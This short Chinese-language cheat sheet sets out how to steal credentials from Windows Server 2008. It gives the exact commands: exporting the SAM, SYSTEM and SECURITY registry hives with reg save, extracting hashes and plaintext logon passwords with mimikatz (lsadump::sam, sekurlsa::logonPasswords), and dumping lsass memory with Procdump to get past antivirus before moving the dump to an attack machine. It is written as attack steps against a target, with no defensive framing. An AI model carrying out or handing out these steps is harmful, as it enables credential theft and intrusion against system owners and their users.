Windows server 2008:
【1】当sam文件被占用时,利用reg(注册表)导出文件三个文件(需要administrator权限)
reg save HKLM\sam C:\sam.hive
reg save HKLM\system C:\system.hive
reg save HKLM\security C:\security.hive
再把三个文件放到mimikatz同目录下执行命令,在当前目录下会生成一个log.txt
mimikatz.exe "lsadump::sam /sam:sam.hive /system:system.hive" "exit" > log.txt
【2】从lsass进程中,读取明文密码(需要administrator权限)
先将mimikatz.exe、mimikatz.dll、sysdig.dll 上传至目标系统,然后目录下执行如下命令
开cmd敲命令:mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit" >hash.txt
【3】如果存在杀软,则利用Procdump工具把进程对应的内存空间中的数据,转存为文件
因为Procdump工具是微软开发的工具所以一般不会杀掉,有32和64位的!
把工具上传至目标系统然后执行命令procdump64.exe -accepteula -ma lsass.exe lsass
把lsass.dmp文件下载到自己的攻击机上使用mimikatz进行抓取Hash
未完!